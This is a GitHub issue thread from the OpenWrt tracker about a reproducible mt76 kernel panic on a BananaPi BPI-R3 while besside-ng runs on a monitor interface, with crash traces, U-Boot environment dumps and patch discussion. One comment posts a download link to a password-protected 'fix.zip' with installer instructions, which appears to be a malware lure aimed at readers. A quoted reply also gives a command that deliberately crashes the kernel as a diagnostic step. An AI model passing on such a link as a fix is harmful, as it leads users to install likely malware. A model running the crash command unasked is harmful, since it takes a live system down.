openwrt/openwrt #16279: Mediatek mt76: Reproducible kernel crash while using besside-ng, "Bad beacon"

brainstorm, 2024-08-29:
### Describe the bug

I configured the **MediaTek MT7986 802.11ax/b/g/n** radio as both ap and monitor (for WIDS purposes) on my BananaPi BPI-R3. Running `tcpdump -i phy0-mon0` runs fine with no problems, but when I test `besside-ng` against another external AP on my appartment (with target flags for BSSID), I get the following kernel crash when running `besside-ng` (as found in the `aircrack-ng` package). Running `besside-ng` with no flags yields the same effect, kernel crash and loss of connectivity (I retrieved this information via serial console):

```
Bad beacon
[219266.459470] Unable to handle kernel read from unreadable memory at virtual address 0000000000000430
[219266.468853] Mem abort info:
[219266.473094]   ESR = 0x0000000096000005
[219266.478303]   EC = 0x25: DABT (current EL), IL = 32 bits
[219266.485057]   SET = 0, FnV = 0
[219266.488357]   EA = 0, S1PTW = 0
[219266.491569]   FSC = 0x05: level 1 translation fault
[219266.496514] Data abort info:
[219266.499468]   ISV = 0, ISS = 0x00000005
[219266.503373]   CM = 0, WnR = 0
[219266.506411] user pgtable: 4k pages, 39-bit VAs, pgdp=000000004a5ae000
[219266.512920] [0000000000000430] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
[219266.521689] Internal error: Oops: 0000000096000005 [#1] SMP
[219266.527327] Modules linked in: rtw88_8822ce rtw88_8822c rtw88_8822be rtw88_8822b rtw88_8723de rtw88_8723d rtw88_pci rtw88_core pppoe ppp_async nft_fib_inet nf_flow_table_ipv6 nf_flow_table_ipv4 nf_flow_table_inet wireguard pppox ppp_generic nft_reject_ipv6 nft_reject_ipv4 nft_reject_inet nft_reject nft_redir nft_quota nft_objref nft_numgen nft_nat nft_masq nft_log nft_limit nft_hash nft_flow_offload nft_fib_ipv6 nft_fib_ipv4 nft_fib nft_ct nft_counter nft_chain_nat nf_tables nf_nat nf_flow_table nf_conntrack mt7915e mt76_connac_lib mt76 mac80211 libchacha20poly1305 chacha_neon cfg80211 spidev slhc sfp poly1305_neon nfnetlink nf_reject_ipv6 nf_reject_ipv4 nf_log_syslog nf_defrag_ipv6 nf_defrag_ipv4 mdio_i2c libcurve25519_generic libcrc32c libchacha crc_ccitt compat crypto_safexcel pwm_fan i2c_gpio i2c_algo_bit ip6_udp_tunnel udp_tunnel sha1_generic seqiv md5 des_generic libdes authencesn authenc leds_gpio xhci_plat_hcd xhci_pci xhci_mtk_hcd xhci_hcd nvme nvme_core gpio_button_hotplug
[219266.527459]  usbcore usb_common
[219266.617597] CPU: 2 PID: 1053 Comm: mt76-tx phy0 Not tainted 5.15.162 #0
[219266.624620] Hardware name: Bananapi BPI-R3 (DT)
[219266.630604] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[219266.639011] pc : 0xffffffc000a92240 [mt76_connac_lib@000000000f261307+0xb000]
[219266.647594] lr : 0xffffffc000a92808 [mt76_connac_lib@000000000f261307+0xb000]
[219266.656175] sp : ffffffc008ef3900
[219266.659730] x29: ffffffc008ef3900 x28: 0000000000000000 x27: 0000000000000000
[219266.666932] x26: ffffff8000e1244e x25: 0000000000000000 x24: ffffff8009986900
[219266.674133] x23: 0000000000000000 x22: 0000000000000000 x21: ffffff8009982900
[219266.681334] x20: ffffff800a2f9b00 x19: 0000000000000000 x18: 0000000000000000
Bad beacon
 x17: 0000000000001f68 x16: ffffffc008eaa000 x15: 0000000000000c90
[219266.701804] x14: ffffffc008eaac90 x13: 00001854b86ac976 x12: 0000000000007984
[219266.709007] x11: 0000000020007800 x10: 0000000000007920 x9 : 0000000000000000
[219266.716209] x8 : 0000000000000000 x7 : 0000000000007961 x6 : 0000000020007801
[219266.723410] x5 : 000000000000000c x4 : 00000000000c0000 x3 : 0000000000000000
[219266.730611] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffffff8009982970
[219266.737813] Call trace:
[219266.740675]  0xffffffc000a92240 [mt76_connac_lib@000000000f261307+0xb000]
[219266.748910]  0xffffffc000a92808 [mt76_connac_lib@000000000f261307+0xb000]
[219266.757146]  0xffffffc000aa8c04 [mt7915e@000000004ab193c5+0x22000]
Bad beacon
[219266.764774]  0xffffffc000a7b350 [mt76@000000000396de8e+0x11000]
[219266.772143]  0xffffffc000a7ffd8 [mt76@000000000396de8e+0x11000]
[219266.779511]  0xffffffc000a81a34 [mt76@000000000396de8e+0x11000]
[219266.786880]  0xffffffc000a81ecc [mt76@000000000396de8e+0x11000]
[219266.794248]  0xffffffc000a79648 [mt76@000000000396de8e+0x11000]
[219266.801098]  0xffffffc008058d2c
[219266.804310]  0xffffffc00801581c
[219266.807524] Code: a9025bf5 aa0003f5 9101c000 a90363f7 (f9421821) 
[219266.813684] ---[ end trace 8694d47d44d0bb1f ]---
[219266.818986] Kernel panic - not syncing: Oops: Fatal exception in interrupt
[219266.825929] SMP: stopping secondary CPUs
[219266.829927] Kernel Offset: disabled
[219266.833484] CPU features: 0x0,00000000,20000802
[219266.838084] Memory Limit: none
[219266.841745] Rebooting in 3 seconds..
```

This issue might be related to:

https://github.com/aircrack-ng/aircrack-ng/pull/2275/files

### OpenWrt version

r24012-d8dd03c46f

### OpenWrt release

23.05.4

### OpenWrt target/subtarget

mediatek/filogic

### Device

Bananapi BPI-R3

### Image kind

Official downloaded image

### Steps to reproduce

1. Define both `phy0-ap0` to serve a few clients and also `phy0-mon0` for monitoring.
2. Run besside-ng against the `phy0-mon0` interface.
3. Kernel crash within seconds.

### Actual behaviour

The system reboots after the following:

[219266.841745] Rebooting in 3 seconds..

But doesn't recover, a hard power cycling (removing barrel jack) needs to be performed instead to recover normal operation.

### Expected behaviour

I expect that a userspace tool such as `besside-ng` should not crash the kernel.

### Terms

- [X] I am reporting an issue for OpenWrt, not an unsupported fork.

brainstorm, 2024-08-29:
Here's a cleaner backtrace (where I run `besside-ng` via SSH instead of via serial console)... on my previous backtrace both output was interspersed since I was running the command on the serial console. 

This one is cleaner and shows the unrecoverable boot state after the automatic reboot from the kernel panic:

```
[ 1136.343090] device phy0-mon0 entered promiscuous mode
[ 1148.316376] Unable to handle kernel read from unreadable memory at virtual address 0000000000000430
[ 1148.325422] Mem abort info:
[ 1148.328200]   ESR = 0x0000000096000005
[ 1148.331942]   EC = 0x25: DABT (current EL), IL = 32 bits
[ 1148.337235]   SET = 0, FnV = 0
[ 1148.340279]   EA = 0, S1PTW = 0
[ 1148.343404]   FSC = 0x05: level 1 translation fault
[ 1148.348262] Data abort info:
[ 1148.351130]   ISV = 0, ISS = 0x00000005
[ 1148.354948]   CM = 0, WnR = 0
[ 1148.357900] user pgtable: 4k pages, 39-bit VAs, pgdp=000000004966c000
[ 1148.364325] [0000000000000430] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
[ 1148.373006] Internal error: Oops: 0000000096000005 [#1] SMP
[ 1148.378559] Modules linked in: pppoe ppp_async nft_fib_inet nf_flow_table_ipv6 nf_flow_table_ipv4 nf_flow_table_inet wireguard pppox ppp_generic nft_reject_ipv6 nft_reject_ipv4 nft_reject_inet nft_reject nft_redir nft_quota nft_objref nft_numgen nft_nat nft_masq nft_log nft_limit nft_hash nft_flow_offload nft_fib_ipv6 nft_fib_ipv4 nft_fib nft_ct nft_counter nft_chain_nat nf_tables nf_nat nf_flow_table nf_conntrack mt7915e mt76_connac_lib mt76 mac80211 libchacha20poly1305 chacha_neon cfg80211 spidev slhc sfp poly1305_neon nfnetlink nf_reject_ipv6 nf_reject_ipv4 nf_log_syslog nf_defrag_ipv6 nf_defrag_ipv4 mdio_i2c libcurve25519_generic libcrc32c libchacha crc_ccitt compat crypto_safexcel pwm_fan i2c_gpio i2c_algo_bit ip6_udp_tunnel udp_tunnel sha1_generic seqiv md5 des_generic libdes authencesn authenc leds_gpio xhci_plat_hcd xhci_pci xhci_mtk_hcd xhci_hcd nvme nvme_core gpio_button_hotplug usbcore usb_common
[ 1148.458851] CPU: 1 PID: 1055 Comm: mt76-tx phy0 Not tainted 5.15.162 #0
[ 1148.465446] Hardware name: Bananapi BPI-R3 (DT)
[ 1148.469959] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 1148.476899] pc : 0xffffffc000a92240 [mt76_connac_lib@00000000a6926b6b+0xb000]
[ 1148.484025] lr : 0xffffffc000a92808 [mt76_connac_lib@00000000a6926b6b+0xb000]
[ 1148.491139] sp : ffffffc00912b900
[ 1148.494437] x29: ffffffc00912b900 x28: 0000000000000000 x27: 0000000000000000
[ 1148.501553] x26: ffffff800a518c4e x25: 0000000000000000 x24: ffffff8009aa6900
[ 1148.508667] x23: 0000000000000000 x22: 0000000000000000 x21: ffffff8009aa2900
[ 1148.515782] x20: ffffff800ac14f00 x19: 0000000000000000 x18: ffffffffffffc8a8
[ 1148.522898] x17: 000000000000d6b0 x16: ffffffc00901d000 x15: ffffff8000c091a6
[ 1148.530013] x14: ffffffffffffc800 x13: 0001710e84979312 x12: 0000000000007984
[ 1148.537128] x11: 0000000020007800 x10: 0000000000007920 x9 : 0000000000000000
[ 1148.544243] x8 : 0000000000000000 x7 : 0000000000007961 x6 : 0000000020007801
[ 1148.551358] x5 : 000000000000000c x4 : 00000000000c0000 x3 : 0000000000000000
[ 1148.558473] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffffff8009aa2970
[ 1148.565588] Call trace:
[ 1148.568021]  0xffffffc000a92240 [mt76_connac_lib@00000000a6926b6b+0xb000]
[ 1148.574790]  0xffffffc000a92808 [mt76_connac_lib@00000000a6926b6b+0xb000]
[ 1148.581557]  0xffffffc000aa8c04 [mt7915e@00000000e5192252+0x22000]
[ 1148.587718]  0xffffffc000a7b350 [mt76@00000000a6d71715+0x11000]
[ 1148.593618]  0xffffffc000a7ffd8 [mt76@00000000a6d71715+0x11000]
[ 1148.599519]  0xffffffc000a81a34 [mt76@00000000a6d71715+0x11000]
[ 1148.605419]  0xffffffc000a81ecc [mt76@00000000a6d71715+0x11000]
[ 1148.611320]  0xffffffc000a79648 [mt76@00000000a6d71715+0x11000]
[ 1148.617220]  0xffffffc008058d2c
[ 1148.620345]  0xffffffc00801581c
[ 1148.623474] Code: a9025bf5 aa0003f5 9101c000 a90363f7 (f9421821) 
[ 1148.629547] ---[ end trace 8f8f5468a86fd983 ]---
[ 1148.639355] Kernel panic - not syncing: Oops: Fatal exception in interrupt
[ 1148.646210] SMP: stopping secondary CPUs
[ 1148.650118] Kernel Offset: disabled
[ 1148.653589] CPU features: 0x0,00000000,20000802
[ 1148.658104] Memory Limit: none
[ 1148.666227] Rebooting in 3 seconds..

F0: 102B 0000

FA: 1040 0000

FA: 1040 0000 [0200]

F9: 103F 0000

F3: 1006 0033 [0200]

F3: 4001 00E0 [0200]

F3: 0000 0000

[... 120 lines cut ...]
ARP Retry count exceeded; starting again
Wrong Image Format for bootm command
ERROR: can't get kernel image!
* spi-nand0
  - device: spi_nand@1
  - parent: spi@1100a000
  - driver: spi_nand
  - type: NAND flash
  - block size:        0x20000 bytes
  - page size:         0x800 bytes
  - OOB size:          64 bytes
  - OOB available:     24 bytes
  - 0x000000000000-0x000008000000 : "spi-nand0"
.  - 0x000000000000-0x000000080000 : "bl2"
.  - 0x000000080000-0x000000380000 : "factory"
.  - 0x000000380000-0x000000580000 : "fip"
.  - 0x000000580000-0x000008000000 : "ubi"
Using ethernet@15100000 device
TFTP from server 192.168.1.254; our IP address is 192.168.1.1
Filename 'openwrt-mediatek-filogic-bananapi_bpi-r3-initramfs-recovery.itb'.
Load address: 0x46000000
Loading: 
```

`Loading:` is the last line ever written, after that unplugging/replugging the router is necessary.

Axolot5784, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

brainstorm, 2024-08-29:
> _Loading: is the last line ever written, after that unplugging/replugging the router is necessary._
> 
> look's like you have u-boot with pstore check and wrong logic, did you try to crush kernel manually?
> 
> `echo c >/proc/sysrq-trigger`
> 
> look into u-boot scripts `fw_printenv` from openwrt or `printenv` inside u-boot
> 
> Maybe you didn't flash recovery partition and u-boot is trying to tftpboot recovery
> 
> `bootcmd=if pstore check ; then run boot_recovery ; else ...`

Hm, good call, I don't recall meddling at all with the default u-boot parameters for the BPI-R3, here they are, I don't see anything wrong with them:

```
boot_default=if env exists flag_recover ; then else run bootcmd ; fi ; run boot_recovery ; setenv replacevol 1 ; run boot_tftp_forever
boot_emmc=run boot_update_conf ; run boot_production ; run boot_recovery
boot_first=if button reset ; then led $bootled_rec on ; run boot_tftp_recovery ; setenv flag_recover 1 ; run boot_default ; fi ; bootmenu
boot_production=run boot_update_conf ; led $bootled_pwr on ; run emmc_read_production && bootm $loadaddr#$bootconf ; led $bootled_pwr off
boot_recovery=run boot_update_conf ; led $bootled_rec on ; run emmc_read_recovery && bootm $loadaddr#$bootconf ; led $bootled_rec off
boot_tftp=run boot_update_conf ; tftpboot $loadaddr $bootfile && bootm $loadaddr#$bootconf
boot_tftp_forever=led $bootled_rec on ; while true ; do run boot_tftp_recovery ; sleep 1 ; done
boot_tftp_production=run boot_update_conf ; tftpboot $loadaddr $bootfile_upg && env exists replacevol && iminfo $loadaddr && run emmc_write_production ; if env exists noboot ; then else bootm $loadaddr#$bootconf ; fi
boot_tftp_recovery=run boot_update_conf ; tftpboot $loadaddr $bootfile && env exists replacevol && iminfo $loadaddr && run emmc_write_recovery ; if env exists noboot ; then else bootm $loadaddr#$bootconf ; fi
boot_tftp_write_bl2=tftpboot $loadaddr $bootfile_bl2 && run emmc_write_bl2
boot_tftp_write_fip=tftpboot $loadaddr $bootfile_fip && run emmc_write_fip
boot_update_conf=if nand info ; then setenv bootconf $bootconf_base#$bootconf_emmc#$bootconf_nand ; else setenv bootconf $bootconf_base#$bootconf_emmc#$bootconf_nor ; fi
bootargs=root=/dev/mmcblk0p65
bootcmd=if pstore check ; then run boot_recovery ; else run boot_emmc ; fi
bootconf=config-mt7986a-bananapi-bpi-r3
bootconf_base=config-mt7986a-bananapi-bpi-r3
bootconf_emmc=mt7986a-bananapi-bpi-r3-emmc
bootconf_nand=mt7986a-bananapi-bpi-r3-nand
bootconf_nor=mt7986a-bananapi-bpi-r3-nor
bootconf_sd=mt7986a-bananapi-bpi-r3-sd
bootdelay=3
bootfile=openwrt-mediatek-filogic-bananapi_bpi-r3-initramfs-recovery.itb
bootfile_bl2=openwrt-mediatek-filogic-bananapi_bpi-r3-emmc-preloader.bin
bootfile_fip=openwrt-mediatek-filogic-bananapi_bpi-r3-emmc-bl31-uboot.fip
bootfile_upg=openwrt-mediatek-filogic-bananapi_bpi-r3-squashfs-sysupgrade.itb
bootled_pwr=green:status
bootled_rec=blue:status
bootmenu_0=Run default boot command.=run boot_default
bootmenu_1=Boot system via TFTP.=run boot_tftp ; run bootmenu_confirm_return
bootmenu_2=Boot production system from eMMC.=run boot_production ; run bootmenu_confirm_return
bootmenu_3=Boot recovery system from eMMC.=run boot_recovery ; run bootmenu_confirm_return
bootmenu_4=Load production system via TFTP then write to eMMC.=setenv noboot 1 ; setenv replacevol 1 ; run boot_tftp_production ; setenv noboot ; setenv replacevol ; run bootmenu_confirm_return
bootmenu_5=Load recovery system via TFTP then write to eMMC.=setenv noboot 1 ; setenv replacevol 1 ; run boot_tftp_recovery ; setenv noboot ; setenv replacevol ; run bootmenu_confirm_return
bootmenu_6=Load BL31+U-Boot FIP via TFTP then write to eMMC.=run boot_tftp_write_fip ; run bootmenu_confirm_return
bootmenu_7=Load BL2 preloader via TFTP then write to eMMC.=run boot_tftp_write_bl2 ; run bootmenu_confirm_return
bootmenu_8=Reboot.=reset
bootmenu_9=Reset all settings to factory defaults.=run reset_factory ; reset
bootmenu_confirm_return=askenv - Press ENTER to return to menu ; bootmenu 60
bootmenu_default=0
bootmenu_delay=3
bootmenu_title=      ( ( ( OpenWrt ) ) )  [eMMC]       U-Boot 2023.07.02-OpenWrt-r23497-6637af95aa (Oct 09 2023 - 21:45:35 +0000)
console=earlycon=uart8250,mmio32,0x11002000 console=ttyS0
emmc_read_production=part start mmc 0 $part_default part_addr && part size mmc 0 $part_default part_size && run mmc_read_vol
emmc_read_recovery=part start mmc 0 $part_recovery part_addr && part size mmc 0 $part_recovery part_size && run mmc_read_vol
emmc_write_bl2=mmc partconf 0 1 1 1 && mmc erase 0x0 0x400 && mmc write $fileaddr 0x0 0x400 ; mmc partconf 0 1 1 0
emmc_write_fip=mmc erase 0x3400 0x2000 && mmc write $fileaddr 0x3400 0x2000 && mmc erase 0x2000 0x800
emmc_write_production=part start mmc 0 $part_default part_addr && part size mmc 0 $part_default part_size && run mmc_write_vol
emmc_write_recovery=part start mmc 0 $part_recovery part_addr && part size mmc 0 $part_recovery part_size && run mmc_write_vol
ethaddr=c2:47:81:17:9c:26
ipaddr=192.168.1.1
loadaddr=0x46000000
mmc_read_vol=mmc read $loadaddr $part_addr 0x100 && imszb $loadaddr image_size && test 0x$image_size -le 0x$part_size && mmc read $loadaddr 0x$part_addr 0x$image_size && setexpr filesize $image_size * 0x200
mmc_write_vol=imszb $loadaddr image_size && test 0x$image_size -le 0x$part_size && mmc erase 0x$part_addr 0x$image_size && mmc write $loadaddr 0x$part_addr 0x$image_size
part_default=production
part_recovery=recovery
reset_factory=eraseenv && reset
```

Thanks for pointing that out @romanovj!

I hope the kernel crash itself gets some scrutiny as well, I've not seen such an instant and reproducible wifi driver crash in a long time.

brainstorm, 2024-08-30:
> Should air monitor work without mtk patch? https://git01.mediatek.com/plugins/gitiles/openwrt/feeds/mtk-openwrt-feeds/+/refs/heads/master/autobuild/autobuild_5.4_mac80211_release/package/kernel/mt76/patches/1002-wifi-mt76-mt7915-air-monitor-support.patch

Good find, I had no clue there was such a mediatek feed, thank you!

I would expect that patch applied to OpenWrt since as it stands now it's a kernel panic: ideally no user space program should cause a kernel panic, imho... 

But I also understand that if OpenWrt's devs haven't added this Mediatek feed on the official firmware selector already is because it might be a world of pain to fetch all those patches and harmonize them with OpenWrt ones?

I feel tempted to fetch that individual monitor patch, quilt it against 5.x/6.x kernels and hope for my PR to be accepted, but I'm not sure that's the best course of action? :-S

I need some advice on how to proceed, really want to see monitor mode working on mt76 and happy to put some effort into it... but on the right direction :)

Neustradamus, 2024-08-30:
To follow this ticket

brainstorm, 2024-09-02:
> @brainstorm recently upstreamed patches from mtk-feeds
> 
> 0005-wifi-mt76-mt7915-Fixed-null-pointer-dereference-issu.patch 0008-wifi-mt76-mt7915-add-support-for-realtime-Rx-rate-up.patch 0012-wifi-mt76-add-sanity-check-to-prevent-kernel-crash.patch 0015-wifi-mt76-mt7915-add-support-for-IEEE-802.11-fragmen.patch 0016-wifi-mt76-mt7915-add-dummy-HW-offload-of-IEEE-802.11.patch 0017-wifi-mt76-mt7915-fix-rx-filter-setting-for-bfee-func.patch 1046-wifi-mt76-try-more-times-when-send-message-timeout.patch
> 
> But if you want more then you can look at https://github.com/cmonroe/feed-wifi-master

Thanks @romanovj (are you "Benjamin Lin" as seen in the lore kernel mailing list, btw)? One more question: are you or Chad Monroe keen or planning on upstreaming those air monitor patches anytime soon?
 
I've purchased an additional BPI-R3 board for dev/testing purposes.

ddreamer75, 2024-09-04:
> @brainstorm recently upstreamed patches from mtk-feeds
>
> 0005-wifi-mt76-mt7915-Fixed-null-pointer-dereference-issu.patch 0008-wifi-mt76-mt7915-add-support-for-realtime-Rx-rate-up.patch [...]

How can i apply these patches from cmonroe ?

brainstorm, 2024-09-04:
> How can i apply these patches from cmonroe ?

This is a bit offtopic for this particular issue, please use the OpenWrt's wiki and forum for your question? Here's a good example resource (it can be a more involved than just that): https://openwrt.org/docs/guide-developer/toolchain/use-patches-with-buildsystem

brainstorm, 2024-11-25:
OTOH, there are quite a few monitor-related patches from @greearb (w/ @nbd168 as delegate) seem to be stuck in patchwork for a while now?: https://patchwork.kernel.org/project/linux-wireless/list/?series=745125